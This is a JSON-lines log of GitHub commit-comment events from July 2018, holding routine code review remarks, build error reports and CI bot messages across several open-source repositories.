{"id":"7936942268","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":29639988,"position":null,"line":null,"path":null,"commit_id":"25b97ecdd796fd9f0db912a597096fa1e2f21373","created_at":"2018-07-09T11:08:45Z","updated_at":"2018-07-09T11:08:45Z","author_association":"MEMBER","body":"Thanks. Merged to staging."}},"created_at":"2018-07-09T11:08:45Z"}
{"id":"7936942461","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/pogo"},"payload":{"comment":{"id":29639989,"position":66,"line":122,"path":"fr.esrf.tango.generator.xtend/src/fr/esrf/tango/pogo/generator/PogoGeneratorModule.java","commit_id":"9bc2fee744bf94bcbc13bea695826fa42970cd37","created_at":"2018-07-09T11:08:48Z","updated_at":"2018-07-09T11:08:48Z","author_association":"MEMBER","body":"the first case will never be the case, because the first letter is no in lower case - `\"Multicpp\"`, and in the switch statement string in `language` is being lower cased..."}},"created_at":"2018-07-09T11:08:48Z"}
{"id":"7936942542","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29639990,"position":null,"line":null,"path":null,"commit_id":"51813be24bf00b88d9294b96a8d6890af1815629","created_at":"2018-07-09T11:08:49Z","updated_at":"2018-07-09T11:08:49Z","author_association":"OWNER","body":"@nfeske disregard the last commit I mentioned, it is incorrect. This is the right snippet."}},"created_at":"2018-07-09T11:08:49Z"}
{"id":"7936943183","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639994,"position":104,"line":104,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:08:58Z","updated_at":"2018-07-09T11:08:58Z","author_association":"NONE","body":"Throw to user."}},"created_at":"2018-07-09T11:08:58Z"}
{"id":"7936944017","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29639995,"position":147,"line":147,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:09:10Z","updated_at":"2018-07-09T11:09:10Z","author_association":"NONE","body":"Throw to user"}},"created_at":"2018-07-09T11:09:10Z"}
{"id":"7936946412","type":"CommitCommentEvent","actor":{"login":"akronek51"},"repo":{"name":"akronek51/projet6_javascript"},"payload":{"comment":{"id":29640000,"position":5,"line":3,"path":"board.js","commit_id":"50a3cac828c9de239aa2088cb8d36fe8c8cb400e","created_at":"2018-07-09T11:09:42Z","updated_at":"2018-07-09T11:09:42Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T11:09:42Z"}
{"id":"7936949278","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29640012,"position":125,"line":125,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:10:21Z","updated_at":"2018-07-09T11:10:21Z","author_association":"NONE","body":"Redundant. Just run from end of array instead of start"}},"created_at":"2018-07-09T11:10:21Z"}
{"id":"7936951272","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640016,"position":18,"line":87,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:10:49Z","updated_at":"2018-07-09T11:10:49Z","author_association":"OWNER","body":"I've assigned it here"}},"created_at":"2018-07-09T11:10:49Z"}
{"id":"7936952025","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29640018,"position":79,"line":96,"path":"Source/Foundation/bsfCore/Scene/BsSceneActor.cpp","commit_id":"1516903bdbd7280cd44567814af12b79252b53cc","created_at":"2018-07-09T11:11:00Z","updated_at":"2018-07-09T11:11:00Z","author_association":"CONTRIBUTOR","body":"If you get a chance to make the change, I'll happily merge :) Otherwise its added to my infinitely growing task list."}},"created_at":"2018-07-09T11:11:00Z"}
{"id":"7936952295","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29640019,"position":139,"line":139,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:11:03Z","updated_at":"2018-07-09T11:11:03Z","author_association":"NONE","body":"Don't use System.out.println"}},"created_at":"2018-07-09T11:11:03Z"}
{"id":"7936953821","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29640023,"position":139,"line":139,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:11:22Z","updated_at":"2018-07-09T11:11:22Z","author_association":"NONE","body":"Throw as exception."}},"created_at":"2018-07-09T11:11:22Z"}
{"id":"7936956521","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29640031,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-09T11:12:00Z","updated_at":"2018-07-09T11:12:00Z","author_association":"MEMBER","body":"@Yivan I can't see a problem, in the source there's `maxmemory 1gb` as it should be. \r\nCan you give me a reference link? \r\n\r\n"}},"created_at":"2018-07-09T11:12:00Z"}
{"id":"7936958500","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29640036,"position":143,"line":143,"path":"src/MyList.java","commit_id":"19751f7b56f2defc42c473f34dd2d4b3f16096f7","created_at":"2018-07-09T11:12:26Z","updated_at":"2018-07-09T11:12:26Z","author_association":"NONE","body":"OK. Also you can use Stream API with skip() and limit() methods."}},"created_at":"2018-07-09T11:12:26Z"}
{"id":"7936961167","type":"CommitCommentEvent","actor":{"login":"JohnyGorsky"},"repo":{"name":"nauriskruzkops/selfservice"},"payload":{"comment":{"id":29640044,"position":16,"line":30,"path":"src/Controller/Calendar/IndexController.php","commit_id":"0c495b9349de756accf16a4985090de0014e2977","created_at":"2018-07-09T11:13:01Z","updated_at":"2018-07-09T11:13:01Z","author_association":"NONE","body":"Typo ($repositoey = $repository)"}},"created_at":"2018-07-09T11:13:01Z"}
{"id":"7936961554","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29640047,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-09T11:13:08Z","updated_at":"2018-07-09T11:13:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T11:13:08Z"}
{"id":"7936961870","type":"CommitCommentEvent","actor":{"login":"t-zuehlsdorff"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29640048,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-09T11:13:11Z","updated_at":"2018-07-09T11:13:11Z","author_association":"NONE","body":"@johannes \r\nWhen trying to build PHP 7.3 on FreeBSD 11.1 i end up with this error after the commit:\r\n```--- sapi/cli/php ---\r\next/mysqlnd/.libs/mysqlnd_auth.o: In function `php_mysqlnd_scramble_sha2':\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfd9): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfe7): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xff9): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1001): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1011): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1023): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x102b): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x103b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x104b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1056): undefined reference to `PHP_SHA256Final'\r\ncc: error: linker command failed with exit code 1 (use -v to see invocation)\r\n*** [sapi/cli/php] Error code 1\r\n\r\nmake[1]: stopped in /wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2\r\n--- sapi/phpdbg/phpdbg ---\r\next/mysqlnd/.libs/mysqlnd_auth.o: In function `php_mysqlnd_scramble_sha2':\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfd9): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfe7): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xff9): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1001): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1011): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1023): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x102b): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x103b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x104b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1056): undefined reference to `PHP_SHA256Final'\r\ncc: error: linker command failed with exit code 1 (use -v to see invocation)\r\n*** [sapi/phpdbg/phpdbg] Error code 1\r\n\r\nmake[1]: stopped in /wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2\r\n--- sapi/fpm/php-fpm ---\r\next/mysqlnd/.libs/mysqlnd_auth.o: In function `php_mysqlnd_scramble_sha2':\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfd9): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xfe7): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0xff9): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1001): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1011): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1023): undefined reference to `PHP_SHA256Final'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x102b): undefined reference to `PHP_SHA256Init'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x103b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x104b): undefined reference to `PHP_SHA256Update'\r\n/wrkdirs/usr/ports/lang/php73/work/php-7.3.0alpha2/ext/mysqlnd/mysqlnd_auth.c:(.text+0x1056): undefined reference to `PHP_SHA256Final'\r\ncc: error: linker command failed with exit code 1 (use -v to see invocation)\r\n*** [sapi/fpm/php-fpm] Error code 1\r\n ```\r\nDid the code changes the build-requirements to for example MySQL 8.x? How can i fix it?"}},"created_at":"2018-07-09T11:13:11Z"}
{"id":"7936963155","type":"CommitCommentEvent","actor":{"login":"darkyuhooxxx"},"repo":{"name":"untwisted/websnake"},"payload":{"comment":{"id":29640050,"position":4,"line":5,"path":"setup.py","commit_id":"4aefd169ca333b395513d0b92387e21571e561e6","created_at":"2018-07-09T11:13:29Z","updated_at":"2018-07-09T11:13:29Z","author_association":"NONE","body":"1"}},"created_at":"2018-07-09T11:13:29Z"}
{"id":"7936966325","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29640054,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T11:14:14Z","updated_at":"2018-07-09T11:14:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T11:14:14Z"}
{"id":"7936968707","type":"CommitCommentEvent","actor":{"login":"dinams"},"repo":{"name":"onnx/onnxmltools"},"payload":{"comment":{"id":29640059,"position":25,"line":25,"path":"README.md","commit_id":"192eb17ef6bd03e2c71fe3443b3dcccd656b912f","created_at":"2018-07-09T11:14:47Z","updated_at":"2018-07-09T11:14:47Z","author_association":"NONE","body":"Df"}},"created_at":"2018-07-09T11:14:47Z"}
{"id":"7936968996","type":"CommitCommentEvent","actor":{"login":"pnprog"},"repo":{"name":"pnprog/goreviewpartner"},"payload":{"comment":{"id":29640060,"position":null,"line":null,"path":null,"commit_id":"789795f7ec12689b8022bc8f4211e27b4c2e3414","created_at":"2018-07-09T11:14:51Z","updated_at":"2018-07-09T11:14:51Z","author_association":"OWNER","body":"Thanks @wonsiks !"}},"created_at":"2018-07-09T11:14:51Z"}
{"id":"7936974471","type":"CommitCommentEvent","actor":{"login":"darkyuhooxxx"},"repo":{"name":"untwisted/websnake"},"payload":{"comment":{"id":29640068,"position":1,"line":2,"path":"setup.py","commit_id":"4aefd169ca333b395513d0b92387e21571e561e6","created_at":"2018-07-09T11:16:04Z","updated_at":"2018-07-09T11:16:04Z","author_association":"NONE","body":"@@  -2 , 7  +2 , 7  @@"}},"created_at":"2018-07-09T11:16:04Z"}
{"id":"7936979326","type":"CommitCommentEvent","actor":{"login":"darkyuhooxxx"},"repo":{"name":"untwisted/websnake"},"payload":{"comment":{"id":29640072,"position":1,"line":2,"path":"setup.py","commit_id":"4aefd169ca333b395513d0b92387e21571e561e6","created_at":"2018-07-09T11:17:08Z","updated_at":"2018-07-09T11:17:08Z","author_association":"NONE","body":"\r\n from distutils.core import setup\r\n setup(name=\"websnake\",\r\n-"}},"created_at":"2018-07-09T11:17:08Z"}
{"id":"7936979788","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640074,"position":18,"line":87,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:17:14Z","updated_at":"2018-07-09T11:17:14Z","author_association":"CONTRIBUTOR","body":"You just assigned the value of the pointer. The memory that that pointer point to is invalid after you free the pointer (the memory that the pointer point to)! Which could cause fault memory access!"}},"created_at":"2018-07-09T11:17:14Z"}
{"id":"7936981132","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29640077,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T11:17:32Z","updated_at":"2018-07-09T11:17:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T11:17:32Z"}
{"id":"7936984774","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29640091,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T11:18:19Z","updated_at":"2018-07-09T11:18:19Z","author_association":"COLLABORATOR","body":"@agriggio \r\n> if we tweak the histmatching logic slightly (see e.g. #4659) then the change won't be visible to old pp3s...\r\n\r\nCurrently it would be visible, see [here](https://github.com/Beep6581/RawTherapee/blob/histmatching-if-needed/rtengine/procparams.cc#L3536). You just need to raise the ppVersion if you change the logic of the matching.\r\nIf we don't want that (as @Beep6581 suggested) we can set `toneCurve.fromHistMatching = true;` ;-)"}},"created_at":"2018-07-09T11:18:19Z"}
{"id":"7936984948","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29640092,"position":36,"line":36,"path":"Week-09/animalfarm.js","commit_id":"5673ab87da639edcc3b7c3d8dfb9cf4bfde67a9d","created_at":"2018-07-09T11:18:22Z","updated_at":"2018-07-09T11:18:22Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-09T11:18:22Z"}
{"id":"7936985760","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29640098,"position":37,"line":37,"path":"Week-09/animalfarm.js","commit_id":"5673ab87da639edcc3b7c3d8dfb9cf4bfde67a9d","created_at":"2018-07-09T11:18:34Z","updated_at":"2018-07-09T11:18:34Z","author_association":"NONE","body":"it should be in a new line"}},"created_at":"2018-07-09T11:18:34Z"}
{"id":"7936986348","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29640101,"position":37,"line":37,"path":"Week-09/animalfarm.js","commit_id":"5673ab87da639edcc3b7c3d8dfb9cf4bfde67a9d","created_at":"2018-07-09T11:18:41Z","updated_at":"2018-07-09T11:18:41Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-09T11:18:41Z"}
{"id":"7936986842","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29640103,"position":40,"line":40,"path":"Week-09/animalfarm.js","commit_id":"5673ab87da639edcc3b7c3d8dfb9cf4bfde67a9d","created_at":"2018-07-09T11:18:48Z","updated_at":"2018-07-09T11:18:48Z","author_association":"NONE","body":"new line"}},"created_at":"2018-07-09T11:18:48Z"}
{"id":"7936988091","type":"CommitCommentEvent","actor":{"login":"wise-rice"},"repo":{"name":"jakeajames/LittleX"},"payload":{"comment":{"id":29640107,"position":null,"line":null,"path":null,"commit_id":"0d1d3c3c93ab0bfe27f33933f218086e4d72df32","created_at":"2018-07-09T11:19:05Z","updated_at":"2018-07-09T11:19:05Z","author_association":"NONE","body":"Does this bring LittleX to the iPad?\r\nSo we have the iPhone X gestures on iPad?"}},"created_at":"2018-07-09T11:19:05Z"}
{"id":"7936990517","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29640112,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T11:19:38Z","updated_at":"2018-07-09T11:19:38Z","author_association":"OWNER","body":"@noobpwnftw but strangely it is getting worse over time. We're now at over 50 timeouts per 250 batch. Can you experiment with having the machine participate with 192 cores for a batch or two."}},"created_at":"2018-07-09T11:19:38Z"}
{"id":"7936990772","type":"CommitCommentEvent","actor":{"login":"ppaalanen"},"repo":{"name":"igel-oss/weston"},"payload":{"comment":{"id":29640114,"position":266,"line":6292,"path":"libweston/compositor-drm.c","commit_id":"98f548bf926641fbba55f5b35e804f732538d413","created_at":"2018-07-09T11:19:42Z","updated_at":"2018-07-09T11:19:42Z","author_association":"CONTRIBUTOR","body":"`drm_virtual_plane_destroy()` does the `wl_list_remove` through `weston_plane_release()`, so I don't think the remove/init is necessary here."}},"created_at":"2018-07-09T11:19:42Z"}
{"id":"7936992302","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29640118,"position":29,"line":145,"path":"themes/survey/vanilla/scripts/ajaxify.js","commit_id":"d40dae716d5d7a58623a8ad334fd17625b8183a7","created_at":"2018-07-09T11:20:03Z","updated_at":"2018-07-09T11:20:03Z","author_association":"COLLABORATOR","body":"Why update the css selector … `[type=submit]:not([data-confirmedby])` is for previous , next, submit and save … `#ls-button-submit` is only for next, submit …\r\n\r\nAnd allow user to add multiple move button if needed …"}},"created_at":"2018-07-09T11:20:03Z"}
{"id":"7936995214","type":"CommitCommentEvent","actor":{"login":"Pascal-Verdier"},"repo":{"name":"tango-controls/pogo"},"payload":{"comment":{"id":29640122,"position":66,"line":122,"path":"fr.esrf.tango.generator.xtend/src/fr/esrf/tango/pogo/generator/PogoGeneratorModule.java","commit_id":"9bc2fee744bf94bcbc13bea695826fa42970cd37","created_at":"2018-07-09T11:20:43Z","updated_at":"2018-07-09T11:20:43Z","author_association":"COLLABORATOR","body":"You are perfectly right.\r\nMy question is: How did it work until today ?\r\nIt is a mystery....\r\nI correct it immediately.\r\n"}},"created_at":"2018-07-09T11:20:43Z"}
{"id":"7936996561","type":"CommitCommentEvent","actor":{"login":"ppaalanen"},"repo":{"name":"igel-oss/weston"},"payload":{"comment":{"id":29640125,"position":null,"line":null,"path":null,"commit_id":"98f548bf926641fbba55f5b35e804f732538d413","created_at":"2018-07-09T11:21:01Z","updated_at":"2018-07-09T11:21:01Z","author_association":"CONTRIBUTOR","body":"All the changes compared to v11 of this patch look good to me and address my previous comments."}},"created_at":"2018-07-09T11:21:01Z"}
{"id":"7936997351","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/vrsttl"},"payload":{"comment":{"id":29640127,"position":null,"line":null,"path":null,"commit_id":"43d8631c024f05cd4f870a1e2da7527c0dede0a7","created_at":"2018-07-09T11:21:12Z","updated_at":"2018-07-09T11:21:12Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-09T11:21:12Z"}
{"id":"7936997397","type":"CommitCommentEvent","actor":{"login":"jasonxiaohan"},"repo":{"name":"jasonxiaohan/DataStructure"},"payload":{"comment":{"id":29640128,"position":null,"line":null,"path":null,"commit_id":"426887f1b4f990f5c59700ae78d878c3871e19e0","created_at":"2018-07-09T11:21:12Z","updated_at":"2018-07-09T11:21:12Z","author_association":"OWNER","body":"ArrayStack,time：0.12251634038226775s\r\nLinkedListStack,time：0.09629444928111977s"}},"created_at":"2018-07-09T11:21:12Z"}
{"id":"7937002013","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29640144,"position":null,"line":null,"path":null,"commit_id":"ad9f9570f340126142008ba64015865cbcde34b9","created_at":"2018-07-09T11:22:14Z","updated_at":"2018-07-09T11:22:14Z","author_association":"COLLABORATOR","body":"See https://github.com/LimeSurvey/LimeSurvey/commit/d40dae716d5d7a58623a8ad334fd17625b8183a7#r29640118"}},"created_at":"2018-07-09T11:22:14Z"}
{"id":"7937005080","type":"CommitCommentEvent","actor":{"login":"husisusi"},"repo":{"name":"fusioninventory/fusioninventory-for-glpi"},"payload":{"comment":{"id":29640149,"position":null,"line":null,"path":null,"commit_id":"1238d567ec8cd4ab916d0c84206a886be5623d57","created_at":"2018-07-09T11:22:58Z","updated_at":"2018-07-09T11:22:58Z","author_association":"NONE","body":"Thanks!!!"}},"created_at":"2018-07-09T11:22:58Z"}
{"id":"7937007035","type":"CommitCommentEvent","actor":{"login":"egorov-by-egorov"},"repo":{"name":"egorov-by-egorov/my_Portfolio"},"payload":{"comment":{"id":29640154,"position":17,"line":16,"path":"src/assets/scripts/modules/login.js","commit_id":"0b6d1546992369ff59f91690e9560314eb33332c","created_at":"2018-07-09T11:23:26Z","updated_at":"2018-07-09T11:23:26Z","author_association":"OWNER","body":"При попытке отправить выдает ошибку xhr.js?ec6c:178 OPTIONS https://localhost:3000/login 0 ()\r\ndispatchXhrRequest @ xhr.js?ec6c:178\r\nxhrAdapter @ xhr.js?ec6c:12\r\ndispatchRequest @ dispatchRequest.js?c4bb:59\r\nPromise.then (async)\r\nrequest @ Axios.js?5e65:51\r\nAxios.(anonymous function) @ Axios.js?5e65:71\r\nwrap @ bind.js?24ff:9\r\nlogin @ login.js?95cd:16\r\nboundFn @ vue.esm.js?efeb:190\r\ninvoker @ vue.esm.js?efeb:2004\r\nfn._withTask.fn._withTask @ vue.esm.js?efeb:1802\r\n14:21:04.622 createError.js?16d0:16 Uncaught (in promise) Error: Network Error\r\n    at createError (createError.js?16d0:16)\r\n    at XMLHttpRequest.handleError (xhr.js?ec6c:87)"}},"created_at":"2018-07-09T11:23:26Z"}
{"id":"7937030822","type":"CommitCommentEvent","actor":{"login":"joakim-noah"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29640196,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-09T11:28:52Z","updated_at":"2018-07-09T11:28:52Z","author_association":"MEMBER","body":"[Here](https://github.com/ldc-developers/ldc/blob/master/driver/codegenerator.cpp#L317), didn't bother changing the type, would it always be aligned anyway? Fixing the alignment in druntime works too."}},"created_at":"2018-07-09T11:28:52Z"}
{"id":"7937031983","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29640200,"position":null,"line":null,"path":null,"commit_id":"1e1a0ea90ec131c53d6b1111604f6b55da0bdbb5","created_at":"2018-07-09T11:29:10Z","updated_at":"2018-07-09T11:29:10Z","author_association":"OWNER","body":"@nlct I added a note about `~` and `which`, could you take a look and see if the text is okay? :wink: "}},"created_at":"2018-07-09T11:29:10Z"}
